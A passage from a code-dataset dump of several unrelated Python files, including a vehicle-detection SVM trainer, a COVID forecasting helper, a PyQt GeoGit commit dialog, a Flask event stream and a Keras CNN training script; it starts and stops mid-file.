train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom helper import single_img_features\n\ncars = glob.glob('data/vehicles/*/*.png')\nnotcars = glob.glob('data/non-vehicles/*/*.png')\n\ncolor_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\norient = 16 # HOG orientations\npix_per_cell = 16 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\nhog_channel = 'ALL' # Can be 0, 1, 2, or \"ALL\"\nspatial_size = (32, 32) # Spatial binning dimensions\nhist_bins = 32 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\n\n\ndef extract_features(imgs):\n # Create a list to append feature vectors to\n features = []\n # Iterate through the list of images\n for file in imgs:\n # Read in each one by one\n image = mpimg.imread(file)\n img_features = single_img_features(image,\n color_space=color_space,\n spatial_size=spatial_size,\n hist_bins=hist_bins,\n orient=orient,\n pix_per_cell=pix_per_cell,\n cell_per_block=cell_per_block,\n hog_channel=hog_channel,\n spatial_feat=spatial_feat,\n hist_feat=hist_feat,\n hog_feat=hog_feat)\n features.append(img_features)\n return features\n\n\nt = time.time()\ncar_features = extract_features(cars)\nnotcar_features = extract_features(notcars)\nt2 = time.time()\nprint(round(t2 - t, 2), 'Seconds to extract HOG features...')\nX = np.vstack((car_features, notcar_features)).astype(np.float64)\nX_scaler = StandardScaler().fit(X)\nscaled_X = 
X_scaler.transform(X)\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(notcar_features))))\n\nX_train, X_test, y_train, y_test = train_test_split(\n scaled_X, y, test_size=0.1, random_state=1)\n\nprint('Using:', orient, 'orientations', pix_per_cell,\n 'pixels per cell and', cell_per_block, 'cells per block')\nprint('Feature vector length:', len(X_train[0]))\nsvc = LinearSVC()\nt = time.time()\nsvc.fit(X_train, y_train)\nt2 = time.time()\nprint(round(t2 - t, 2), 'Seconds to train SVC...')\nprint('Test Accuracy of SVC = ', round(svc.score(X_test, y_test), 4))\nt = time.time()\nn_predict = 10\nprint('My SVC predicts: ', svc.predict(X_test[0:n_predict]))\nprint('For these', n_predict, 'labels: ', y_test[0:n_predict])\nt2 = time.time()\nprint(round(t2 - t, 5), 'Seconds to predict', n_predict, 'labels with SVC')\nCM = confusion_matrix(y_test, svc.predict(X_test))\nprint('False positive {:.2%}'.format(CM[0][1] / len(y_test)))\nprint('False negative {:.2%}'.format(CM[1][0] / len(y_test)))\n\nwith open('svm.pkl', 'wb') as fid:\n pickle.dump(color_space, fid)\n pickle.dump(orient, fid)\n pickle.dump(pix_per_cell, fid)\n pickle.dump(cell_per_block, fid)\n pickle.dump(hog_channel, fid)\n pickle.dump(spatial_size, fid)\n pickle.dump(hist_bins, fid)\n pickle.dump(spatial_feat, fid)\n pickle.dump(hist_feat, fid)\n pickle.dump(hog_feat, fid)\n pickle.dump(svc, fid)\n pickle.dump(X_scaler, fid)\n","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"564210647","text":"import pandas as pd\nimport os.path\nimport numpy as np\nimport datetime\n\nDATE = \"Date\"\nACTUALCASE = \"ActualCases\"\nPREDICTS = \"Predicts\"\nDATE_FORMAT = \"%Y-%m-%d\"\nCASES_COLUMN = \"cases\"\nDATE_COLUMN = \"date\"\n\n\nclass baseModel:\n def __init__(self):\n pass\n\n def save_result(self,\n file_name: str,\n dates: pd.DataFrame,\n actual_data: pd.DataFrame,\n col_name: str,\n forecast_data: pd.DataFrame):\n \"\"\"\n Save prediction along with actual result\n :param file_name: file to save result to\n :param dates: dataframe containing dates\n :param actual_data: actual covid data\n :param col_name: column containing actual cases\n :param forecast_data: prediction data\n :return:\n \"\"\"\n df = pd.DataFrame({\n DATE: dates.tolist(),\n ACTUALCASE: actual_data[col_name].values.tolist(),\n PREDICTS:list(map(int, forecast_data.tolist()))},\n columns=[DATE, ACTUALCASE, PREDICTS])\n\n write_header = False if os.path.exists(file_name) else True\n with open(file_name, \"a+\") as f:\n df.to_csv(f, header=write_header, index=False)\n\n def get_actual_dates(self, dates: pd.DataFrame, start_day: int, end_day: int) -> np.array:\n \"\"\"\n Retrieve dates column\n :param dates: dataframe containing dates\n :param start_day: start day for prediction\n :param end_day: end day of prediction\n :return: dates array\n \"\"\"\n\n start_date = datetime.datetime.strptime(dates.iloc[0], DATE_FORMAT)\n\n dates_array = np.array([(start_date+datetime.timedelta(days=i)).strftime(DATE_FORMAT)\n for i in range(start_day, end_day)])\n\n return dates_array\n\n def get_actual_cases(self, cases: pd.DataFrame, start: int, end: int) -> pd.DataFrame:\n \"\"\"\n :param cases: dataframe containing all actual cases\n :param start: start index of actual cases\n :param end: end index of actual cases\n :return: dataframe containing actual cases\n \"\"\"\n if start >= len(cases):\n return pd.DataFrame(np.nan, index=[n for n in 
range(end-start)], columns=['cases'])\n\n if end < len(cases):\n return cases.iloc[start:end]\n\n return pd.DataFrame(cases[start:].astype(np.int).values.tolist()\n + [np.NaN for i in range(end-len(cases))], columns=[CASES_COLUMN])\n","sub_path":"model/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"593521226","text":"#########################################################\n#\n# SimulationJobOptions/postInclude.Save7GeVpTPileUpTruthJets.py\n# John Chapman\n#\n# Reconfigure MergeTruthJetsTool to save Truth Jets with pT > 7 GeV\n# both in-time and out-of-time.\n#\n# This job option should be added via the postInclude\n# command line argument.\n#\n#########################################################\nfrom AthenaCommon.SystemOfUnits import GeV\nfrom AthenaCommon.AlgSequence import AlgSequence\ntopSequence = AlgSequence()\n\nfor alg in topSequence:\n if 'PileUpToolsAlg' in alg.name():\n alg.PileUpTools[\"MergeTruthJetsTool\"].InTimePtCut = 7.0 * GeV\n alg.PileUpTools[\"MergeTruthJetsTool\"].OutOfTimePtCut = 7.0 * GeV\n break\n if 'MergeTruthJets' == alg.name():\n alg.MergeTruthJetsTool.InTimePtCut = 7.0 * GeV\n alg.MergeTruthJetsTool.OutOfTimePtCut = 7.0 * GeV\n break\n","sub_path":"Simulation/SimulationJobOptions/share/pileup/postInclude.Save7GeVpTPileUpTruthJets.py","file_name":"postInclude.Save7GeVpTPileUpTruthJets.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"5019938","text":"import gym\nimport numpy as np\nimport time\nimport os\n\nfrom openlockagents.OpenLockLearner.util.common import (\n FIXED_STRUCTURE_ATTRIBUTES_GRAPH_SIMPLIFIED_TESTING_PATH,\n CAUSAL_CHAIN_EDGES,\n)\nfrom openlockagents.OpenLockLearner.learner.OpenLockLearnerAgent import (\n OpenLockLearnerAgent,\n)\nfrom openlockagents.OpenLockLearner.main.simplified_testing_scenario import (\n generate_perceptually_causal_relations_simplified_testing_scenario\n)\nimport openlockagents.OpenLockLearner.util.plotter as plotter\nfrom openlockagents.OpenLockLearner.util.setup_util import setup_causal_chain_space, create_and_run_agent\nfrom openlockagents.OpenLockLearner.experiments.IG_vs_random_intervention_common import run_experiment\nfrom openlock.settings_trial import PARAMS\n\n\ndef main():\n fake_model_data = [\n plotter.MultiRunPlotData(\"Fake 1\", np.random.rand(5, 1000)),\n plotter.MultiRunPlotData(\"Fake 2\", np.random.rand(5, 1000)),\n ]\n # plotter.create_plot_from_multi_run_plot_data(fake_model_data, \"Fake x-axis\", \"Fake y-axis\", \"Fake test plot\", data_dir=os.path.expanduser(\"~/Desktop\"))\n\n # compares if random intervention selection is better than intervention selection based on information gain\n\n global_start_time = time.time()\n\n params = PARAMS[\"CE3-CE4\"]\n params[\"data_dir\"] = \"~/Desktop/OpenLockLearningResultsTesting/subjects\"\n params[\"train_scenario_name\"] = \"CE3_simplified\"\n params[\"test_scenario_name\"] = \"CE3_simplified\"\n params[\"train_attempt_limit\"] = 10000\n params[\"test_attempt_limit\"] = 10000\n # params['full_attempt_limit'] = True # run to the full attempt limit, regardless of whether or not all solutions were found\n # run to the full attempt limit, regardless of whether or not all solutions were found\n params[\"full_attempt_limit\"] = False\n params[\"intervention_sample_size\"] = 10\n params[\"chain_sample_size\"] = 1000\n\n 
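# remaining flags configure the causal-chain space (generate_chains is False, so precomputed chains under chain_data_dir are reused)\n    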
params[\"using_ids\"] = True\n params[\"multiproc\"] = True\n\n params['prune_chain_space'] = False\n params['generate_chains'] = False\n\n params[\"chain_data_dir\"] =FIXED_STRUCTURE_ATTRIBUTES_GRAPH_SIMPLIFIED_TESTING_PATH\n params[\"chain_mode\"] = \"full\"\n\n np.random.seed(1234)\n\n structure = CAUSAL_CHAIN_EDGES\n\n perceptually_causal_relations = generate_perceptually_causal_relations_simplified_testing_scenario()\n\n num_runs = 3\n\n run_experiment(\n params=params,\n structure=structure,\n perceptually_causal_relations=perceptually_causal_relations,\n num_runs=num_runs,\n )\n\n print(\"Finished. Total runtime: {}s\".format(time.time() - global_start_time))\n return\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"openlockagents/OpenLockLearner/experiments/IG_vs_random_intervention_simplified_testing_scenario.py","file_name":"IG_vs_random_intervention_simplified_testing_scenario.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"177145397","text":"from PyQt4 import QtGui, QtCore\nfrom opengeo import geogit\nfrom twowaydiff import TwoWayDiffViewerDialog\n\nclass CommitDialog(QtGui.QDialog):\n \n def __init__(self, repo, parent = None):\n super(CommitDialog, self).__init__(parent)\n self.repo = repo\n self.paths = None\n self.diffs = repo.notindatabase()\n self.initGui()\n \n def initGui(self): \n self.resize(600, 400) \n self.setWindowTitle('GeoGit')\n\n self.verticalLayout = QtGui.QVBoxLayout()\n self.verticalLayout.setSpacing(2)\n self.verticalLayout.setMargin(5)\n \n self.msgLabel = QtGui.QLabel(\"Commit message\")\n self.verticalLayout.addWidget(self.msgLabel)\n \n self.splitter = QtGui.QSplitter(self) \n self.splitter.setOrientation(QtCore.Qt.Vertical)\n self.text = QtGui.QPlainTextEdit(self.splitter)\n self.text.textChanged.connect(self.textHasChanged)\n \n self.verticalLayout2 = QtGui.QVBoxLayout(self.splitter)\n self.verticalLayout2.setSpacing(2)\n self.verticalLayout2.setMargin(5)\n \n self.table = QtGui.QTableWidget()\n self.table.setColumnCount(2) \n self.table.setShowGrid(False)\n self.table.verticalHeader().hide()\n self.table.setHorizontalHeaderLabels([\"Path\", \"Status\"])\n self.table.horizontalHeader().setMinimumSectionSize(150) \n self.table.setSelectionMode(QtGui.QAbstractItemView.NoSelection)\n self.table.setRowCount(len(self.diffs)) \n for i, diff in enumerate(self.diffs):\n widget = QtGui.QTableWidgetItem(diff.path)\n widget.setFlags(QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEnabled)\n widget.setCheckState(QtCore.Qt.Checked) \n self.table.setItem(i, 0, widget);\n self.table.setItem(i, 1, QtGui. 
QTableWidgetItem(diff.type()))\n        self.table.horizontalHeader().setStretchLastSection(True)\n        self.table.resizeRowsToContents()\n        # rich-text links, so linkActivated fires with \"all\" / \"none\"\n        self.linksLabel = QtGui.QLabel('<a href=\"all\">All</a>&nbsp;&nbsp;&nbsp;&nbsp;<a href=\"none\">None</a>')\n        self.connect(self.linksLabel, QtCore.SIGNAL(\"linkActivated(QString)\"), self.linkClicked)\n        self.verticalLayout2.addWidget(self.linksLabel)\n        self.verticalLayout2.addWidget(self.table)\n\n        self.verticalLayout.addWidget(self.splitter)\n        self.buttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Close)\n        self.verticalLayout.addWidget(self.buttonBox)\n        self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setEnabled(False)\n        self.setLayout(self.verticalLayout)\n\n        self.table.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n        self.table.customContextMenuRequested.connect(self.showTablePopupMenu)\n\n        self.connect(self.buttonBox, QtCore.SIGNAL(\"accepted()\"), self.okPressed)\n        self.connect(self.buttonBox, QtCore.SIGNAL(\"rejected()\"), self.cancelPressed)\n\n    def linkClicked(self, s):\n        if s == \"all\":\n            self.selectAll()\n        else:\n            self.selectNone()\n\n    def selectNone(self):\n        for i, diff in enumerate(self.diffs):\n            self.table.item(i, 0).setCheckState(QtCore.Qt.Unchecked)\n\n    def selectAll(self):\n        for i, diff in enumerate(self.diffs):\n            self.table.item(i, 0).setCheckState(QtCore.Qt.Checked)\n\n    def showTablePopupMenu(self, point):\n        currentItem = self.table.itemAt(point)\n        self.currentPath = unicode(currentItem.data(0))\n        popupmenu = QtGui.QMenu()\n        viewChangesAction = QtGui.QAction(\"View changes...\", self.table)\n        viewChangesAction.triggered.connect(self.viewChanges)\n        popupmenu.addAction(viewChangesAction)\n        popupmenu.exec_(self.table.mapToGlobal(point))\n\n    def viewChanges(self):\n        dlg = TwoWayDiffViewerDialog(self.repo.getfeaturediffs(geogit.HEAD, geogit.WORK_HEAD, self.currentPath))\n        dlg.exec_()\n\n    def textHasChanged(self):\n        self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setEnabled(str(self.text.toPlainText()) != \"\")\n\n    def getPaths(self):\n        return self.paths\n\n    def getMessage(self):\n        return str(self.text.toPlainText())\n\n    def okPressed(self):\n        self.paths = []\n        for i in range(len(self.diffs)):\n            widget = self.table.item(i, 0)\n            state = widget.checkState()\n            if state == QtCore.Qt.Checked:\n                self.paths.append(self.diffs[i].path)\n        if not self.paths:\n            QtGui.QMessageBox.information(self, \"Cannot commit\",\n                \"No elements have been selected.\\n Empty commits are not allowed.\")\n        else:\n            self.close()\n\n    def cancelPressed(self):\n        self.paths = None\n        self.close()\n","sub_path":"src/opengeo/gui/dialogs/commitdialog.py","file_name":"commitdialog.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"642427369","text":"from datatableview import helpers\nfrom datatableview import Datatable\nfrom datatableview.views import XEditableDatatableView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse\nfrom django.views.generic import DetailView, ListView, RedirectView, UpdateView\n\nfrom .models import BatchException, User\n\n\nclass UserDetailView(LoginRequiredMixin, DetailView):\n    model = User\n    # These next two lines tell the view to index lookups by username\n    slug_field = 'username'\n    slug_url_kwarg = 'username'\n\n\nclass UserRedirectView(LoginRequiredMixin, RedirectView):\n    permanent = False\n\n    def get_redirect_url(self):\n        return reverse('users:detail',\n                       kwargs={'username': 
self.request.user.username})\n\n\nclass UserUpdateView(LoginRequiredMixin, UpdateView):\n\n fields = ['name', ]\n\n # we already imported User in the view code above, remember?\n model = User\n\n # send the user back to their own page after a successful update\n def get_success_url(self):\n return reverse('users:detail',\n kwargs={'username': self.request.user.username})\n\n def get_object(self):\n # Only get the User record for the user making the request\n return User.objects.get(username=self.request.user.username)\n\nclass UserListView(LoginRequiredMixin, ListView):\n model = User\n # These next two lines tell the view to index lookups by username\n slug_field = 'username'\n slug_url_kwarg = 'username'\n\nclass XEditableColumnsDatatableView(XEditableDatatableView):\n template_name = \"batchexception_list.html\"\n model = BatchException\n class datatable_class(Datatable):\n class Meta:\n columns = ['batchExceptionID', 'batchID', 'createdBy', 'createdOn', 'modifiedBy', 'modifiedOn', 'fileName', 'exceptionReason']\n processors = {\n 'batchExceptionID': helpers.make_xeditable,\n 'batchID': helpers.make_xeditable,\n 'createdBy': helpers.make_xeditable,\n 'createdOn': helpers.make_xeditable,\n 'modifiedBy': helpers.make_xeditable,\n 'modifiedOn': helpers.make_xeditable,\n 'fileName': helpers.make_xeditable,\n 'exceptionReason': helpers.make_xeditable,\n }\n\n\n\"\"\"\nclass BatchExceptionDatatableView(XEditableDatatableView):\n model = BatchException\n #template_name = 'users/x_editable_columns.html'\n datatable_options = {\n \t'columns': [\n ('ID', 'batchExcpetionID', helpers.make_xeditable),\n ('Batch Id', 'batchID', helpers.make_xeditable),\n ('Created By', 'createdBy', helpers.make_xeditable),\n ('Created Date', 'createdOn', helpers.make_xeditable),\n ('Modified By', 'modifiedBy', helpers.make_xeditable),\n ('Modified Date', 'modifiedOn', helpers.make_xeditable),\n ('File Name', 'fileName', helpers.make_xeditable) \n ]\n }\n\n implementation = u\n class BatchExceptionDatatableView(XEditableDatatableView):\n model = BatchException\n template_name = 'users/x_editable_columns.html'\n datatable_options = {\n \t 'columns': [\n ('ID', 'batchExcpetionID', helpers.make_xeditable),\n ('Batch Id', 'batchID', helpers.make_xeditable),\n ('Created By', 'createdBy', helpers.make_xeditable),\n ('Created Date', 'createdOn', helpers.make_xeditable),\n ('Modified By', 'modifiedBy', helpers.make_xeditable),\n ('Modified Date', 'modifiedOn', helpers.make_xeditable),\n ('File Name', 'fileName', helpers.make_xeditable)\n ]\n } \n
// Page javascript\ndatatableview.auto_initialize = false;\n$(function(){\n    var xeditable_options = {};\n    datatableview.initialize($('.datatable'), {\n        fnRowCallback: datatableview.make_xeditable(xeditable_options),\n    });\n})\"\"\"\n","sub_path":"clo_project/clo_project/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"233862307","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\nimport multiprocessing\nimport threading\nimport time\nimport traceback\nfrom enum import Enum\n\nfrom webapp_config import APP_URL_PREFIX\n\nfrom flask import Blueprint, Response, request\n\nblueprint = Blueprint(\"webapp-event\", __name__, url_prefix=APP_URL_PREFIX)\n\n\nclass EVENT_TYPE(Enum):\n    CONTROL = \"control\"\n    SCHEDULE = \"schedule\"\n    LOG = \"log\"\n\n\n# NOTE: サイズは上の Enum の個数+1 にしておく\nevent_count = multiprocessing.Array(\"i\", 4)\n\nis_stop_watch = False\n\n\ndef notify_watch_impl(queue):\n    global is_stop_watch\n\n    logging.info(\"Start notify watch thread\")\n\n    while True:\n        if is_stop_watch:\n            break\n        try:\n            if not queue.empty():\n                notify_event(queue.get())\n            time.sleep(0.1)\n        except OverflowError:  # pragma: no cover\n            # NOTE: テストする際,freezer 使って日付をいじるとこの例外が発生する\n            logging.debug(traceback.format_exc())\n            pass\n\n    logging.info(\"Stop notify watch thread\")\n\n\ndef notify_watch(queue):\n    global is_stop_watch\n\n    is_stop_watch = False\n    threading.Thread(target=notify_watch_impl, args=(queue,)).start()\n\n\ndef stop_watch():\n    global is_stop_watch\n\n    is_stop_watch = True\n\n\ndef event_index(event_type):\n    if event_type == EVENT_TYPE.CONTROL:\n        return 0\n    elif event_type == EVENT_TYPE.SCHEDULE:\n        return 1\n    elif event_type == EVENT_TYPE.LOG:\n        return 2\n    else:  # pragma: no cover\n        return 3\n\n\ndef notify_event(event_type):\n    global event_count\n    event_count[event_index(event_type)] += 1\n\n\n@blueprint.route(\"/api/event\", methods=[\"GET\"])\ndef api_event():\n    global event_count\n\n    count = request.args.get(\"count\", 0, type=int)\n\n    def event_stream():\n        last_count = []\n        for i in range(len(event_count)):\n            last_count.append(event_count[i])\n\n        i = 0\n        while True:\n            time.sleep(1)\n            for name, event_type in EVENT_TYPE.__members__.items():\n                index = event_index(event_type)\n\n                if last_count[index] != event_count[index]:\n                    logging.debug(\"notify event: {name}\".format(name=event_type.value))\n                    yield \"data: {}\\n\\n\".format(event_type.value)\n                    last_count[index] = event_count[index]\n            i += 1\n\n            if i == count:\n                return\n\n    res = Response(event_stream(), mimetype=\"text/event-stream\")\n    res.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n    res.headers.add(\"Cache-Control\", \"no-cache\")\n    res.headers.add(\"X-Accel-Buffering\", \"no\")\n\n    return res\n","sub_path":"flask/lib/webapp_event.py","file_name":"webapp_event.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"368276201","text":"\nclass Sector:\n\n    def __init__(self):\n        # armazena o nome da rua\n        self.street =\"\"\n\n        self.data = \"\"\n        self.hora = \"\"\n\n        #armazena o  numero atribuido ao setor da rua\n        self.sectorNumber = \"\"\n\n        #armazena a velocidade media\n        self.averageSpeed =  0.0\n\n        self.amountBus = 0\n\n        self.busList = []\n","sub_path":"Sector.py","file_name":"Sector.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"168209894","text":"\"\"\"\r\n依次绕着X,Y,Z固定轴旋转变换矩阵\r\n\"\"\"\r\nimport numpy as np\r\nfrom numpy import sin, cos\r\n\r\n# 保留三位小数,不使用科学技术法\r\nnp.set_printoptions(precision=3, suppress=True)\r\n\r\nq_x = np.radians(-90)\r\nq_y = np.radians(0)\r\nq_z = np.radians(-90)\r\n\r\nR_x = np.array([\r\n    [1, 0, 0],\r\n    [0, cos(q_x), - sin(q_x)],\r\n    [0, sin(q_x),   cos(q_x)],\r\n])\r\n\r\nR_y = np.array([\r\n    [cos(q_y), 0, sin(q_y)],\r\n    [0, 1, 0],\r\n    [-sin(q_y), 0, cos(q_y)],\r\n])\r\n\r\nR_z = np.array([\r\n    [cos(q_z), - sin(q_z), 0],\r\n    [sin(q_z),   cos(q_z), 0],\r\n    [0, 0, 1],\r\n])\r\n\r\nprint(R_x)\r\n\r\nR = R_z @ R_y @ R_x\r\nprint(R)\r\n","sub_path":"day24-坐标系与空间变换/代码/CoordinateFrame/07-RotationMatrix.py","file_name":"07-RotationMatrix.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"227376754","text":"import os\r\nimport time\r\nimport tensorflow as tf\r\nimport numpy\r\nimport random\r\nimport numpy as np\r\nimport cv2\r\nfrom PIL import Image\r\nfrom keras import *\r\nfrom keras import utils as np_utils\r\nfrom keras.layers import *\r\nfrom keras.models import Model,load_model,model_from_json\r\nfrom keras import backend as K\r\nfrom keras.callbacks import CSVLogger,EarlyStopping,ModelCheckpoint,TensorBoard,ReduceLROnPlateau\r\nfrom keras.optimizers import Adam\r\nfrom Capsule_Keras import *\r\nfrom evaluate_tools import plot_confusion_matrix,evaluate\r\nimport keras.backend.tensorflow_backend as KTF\r\nfrom utils import *\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\nwidth=420\r\nheight=131\r\nnum_of_classes=3\r\nbatch_size=32\r\ntrain_mapping_file='./data/CNN_x_y_mapping.csv'\r\nvali_mapping_file='./data/CNN_vali_x_y_mapping.csv'\r\nmappings=[train_mapping_file,vali_mapping_file]\r\n\r\npolluted_train_basedir='./data/polluted'\r\npositive_train_basedir='./data/positive'\r\nnegative_train_basedir='./data/negative'\r\npolluted_vali_basedir='./data/vali/polluted'\r\npositive_vali_basedir='./data/vali/positive'\r\nnegative_vali_basedir='./data/vali/negative'\r\nbasedirs=[polluted_train_basedir,positive_train_basedir,negative_train_basedir,polluted_vali_basedir,positive_vali_basedir,negative_vali_basedir]\r\n\r\ndef config_environment(args):\r\n    os.environ['CUDA_VISIBLE_DEVICES'] = '1'\r\n    config = tf.ConfigProto()\r\n    config.gpu_options.allow_growth=True\r\n    session = tf.Session(config=config)\r\n    KTF.set_session(session)\r\n    batch_size=args.batch\r\n    \r\n\r\ndef get_model(args):\r\n    model=Sequential()\r\n    model.add(Conv2D(32,(3,3),input_shape=(args.height,args.width,3),data_format='channels_last'))\r\n    model.add(Activation('relu'))\r\n    model.add(MaxPool2D(pool_size=(2,2)))\r\n\r\n    model.add(Conv2D(64,(3,3)))\r\n    model.add(Activation('relu'))\r\n    model.add(MaxPool2D(pool_size=(2,2)))\r\n    model.add(Dropout(0.25))\r\n\r\n    model.add(Flatten())\r\n    model.add(Dense(32))\r\n    model.add(Activation('relu'))\r\n    model.add(BatchNormalization())\r\n    model.add(Dense(args.n_labels))\r\n    model.add(Activation('softmax'))\r\n    \r\n    model.summary()\r\n    return model\r\n\r\ndef train(args):\r\n    model=get_model(args)\r\n    model.compile(loss='categorical_crossentropy',optimizer=Adam(),metrics=['accuracy'])\r\n\r\n    if not os.path.exists('./log'):\r\n        os.mkdir('./log')\r\n    nowtime=time.strftime(\"%Y-%m-%d-%H:%M\", time.localtime())\r\n    print(\"######### TRAINING FILE POSTFIX #########\")\r\n    print(\" \"*13,nowtime)\r\n    print(\"#########################################\")\r\n    scriptBackuper(os.path.basename(__file__),nowtime)\r\n    cblog = CSVLogger('./log/cnn_'+nowtime+'.csv')\r\n    cbtb = TensorBoard(log_dir='./Graph',batch_size=args.batch)\r\n    cbckpt=ModelCheckpoint('./models/cnn_'+nowtime+'_best.h5',monitor='val_loss',save_best_only=True)\r\n    cbes=EarlyStopping(monitor='val_loss', patience=10, verbose=0, mode='auto')\r\n    cbrlr=ReduceLROnPlateau()\r\n    x_train_list,y_train,indexes=read_x_y_mapping(mappings,basedirs,'train',not args.balance,args)\r\n    x_vali_list,y_vali,_=read_x_y_mapping(mappings,basedirs,'vali',False,args)\r\n    x_vali=load_all_valid(x_vali_list,args)\r\n    try:\r\n        model.fit_generator(\r\n            data_generator(True,x_train_list,y_train,args,indexes),\r\n            validation_data=(x_vali,y_vali),\r\n           
 validation_steps=1,\r\n            steps_per_epoch=(15),\r\n            epochs=args.epochs,\r\n            callbacks=[cblog,cbtb,cbckpt],\r\n            class_weight=([0.092,0.96,0.94] if not args.balance else [1,1,1])\r\n        )\r\n        model.save('./models/cnn_'+nowtime+'.h5')\r\n        model.save_weights('./models/cnn_'+nowtime+'_weight.h5')\r\n        jst=model.to_json()\r\n        with open('./models/cnn_'+nowtime+'_json.h5','w') as file:\r\n            file.write(jst)\r\n        \r\n        y_pred=model.predict(x_vali)\r\n        y_pred=np.argmax(y_pred,axis=1)\r\n        y_ture=np.argmax(y_vali,axis=1)\r\n        labels=['negative','positive','polluted']\r\n        plot_confusion_matrix(y_ture,y_pred,labels)\r\n        evaluate(y_ture,y_pred)\r\n    except KeyboardInterrupt:\r\n        os.system(\"sh purge.sh \"+nowtime)\r\n    \r\ndef train_on_positive(args):\r\n    model=get_model(args)\r\n    model.compile(loss='categorical_crossentropy',optimizer=Adam(),metrics=['accuracy'])\r\n\r\n    if not os.path.exists('./log'):\r\n        os.mkdir('./log')\r\n    nowtime=time.strftime(\"%Y-%m-%d-%H:%M\", time.localtime())\r\n    print(\"######### TRAINING FILE POSTFIX #########\")\r\n    print(\" \"*13,nowtime)\r\n    print(\"#########################################\")\r\n    scriptBackuper(os.path.basename(__file__),nowtime)\r\n    cblog = CSVLogger('./log/cnn_'+nowtime+'.csv')\r\n    cbtb = TensorBoard(log_dir='./Graph',batch_size=args.batch)\r\n    cbckpt=ModelCheckpoint('./models/cnn_'+nowtime+'_best.h5',monitor='val_loss',save_best_only=True)\r\n    cbes=EarlyStopping(monitor='val_loss', patience=10, verbose=0, mode='auto')\r\n    cbrlr=ReduceLROnPlateau()\r\n    x_train_list,y_train,t_indexes=read_x_y_mapping(mappings,basedirs,'train',not args.balance,args)\r\n    x_vali_list,y_vali,v_indexes=read_x_y_mapping(mappings,basedirs,'vali',False,args)\r\n    x_train_list=x_train_list[t_indexes[1][0]:t_indexes[1][1]+1]\r\n    y_train=y_train[t_indexes[1][0]:t_indexes[1][1]+1]\r\n    x_vali_list=x_vali_list[v_indexes[1][0]:v_indexes[1][1]+1]\r\n    y_vali=y_vali[v_indexes[1][0]:v_indexes[1][1]+1]\r\n    x_train=load_all_valid(x_train_list,args)\r\n    x_vali=load_all_valid(x_vali_list,args)\r\n    try:\r\n        datagen = ImageDataGenerator(\r\n            featurewise_center=False,  # set input mean to 0 over the dataset\r\n            samplewise_center=False,  # set each sample mean to 0\r\n            featurewise_std_normalization=False,  # divide inputs by std of the dataset\r\n            samplewise_std_normalization=False,  # divide each input by its std\r\n            zca_whitening=False,  # apply ZCA whitening\r\n            zca_epsilon=1e-06,  # epsilon for ZCA whitening\r\n            rotation_range=0,  # randomly rotate images in the range (degrees, 0 to 180)\r\n            # randomly shift images horizontally (fraction of total width)\r\n            width_shift_range=0.1,\r\n            # randomly shift images vertically (fraction of total height)\r\n            height_shift_range=0.1,\r\n            shear_range=0.,  # set range for random shear\r\n            zoom_range=0.,  # set range for random zoom\r\n            channel_shift_range=0.,  # set range for random channel shifts\r\n            # set mode for filling points outside the input boundaries\r\n            fill_mode='nearest',\r\n            cval=0.,  # value used for fill_mode = \"constant\"\r\n            horizontal_flip=False,  # randomly flip images\r\n            vertical_flip=True,  # randomly flip 
images\r\n            # set rescaling factor (applied before any other transformation)\r\n            rescale=None,\r\n            # set function that will be applied on each input\r\n            preprocessing_function=None,\r\n            # image data format, either \"channels_first\" or \"channels_last\"\r\n            data_format=None,\r\n            # fraction of images reserved for validation (strictly between 0 and 1)\r\n            validation_split=0.0)\r\n\r\n        # Compute quantities required for feature-wise normalization\r\n        # (std, mean, and principal components if ZCA whitening is applied).\r\n        datagen.fit(x_train)\r\n        model.fit_generator(\r\n            datagen.flow(x_train, y_train,\r\n                        batch_size=args.batch),\r\n            validation_data=(x_vali,y_vali),\r\n            validation_steps=1,\r\n            steps_per_epoch=15,\r\n            epochs=10,\r\n            callbacks=[cblog,cbtb,cbckpt],\r\n            class_weight=([1,1,1])\r\n        )\r\n    except KeyboardInterrupt:\r\n        os.system(\"sh purge.sh \"+nowtime)\r\n    return model,nowtime\r\n\r\ndef train_on_all(args,model,nowtime):\r\n    x_train_list,y_train,indexes=read_x_y_mapping(mappings,basedirs,'train',False,args)\r\n    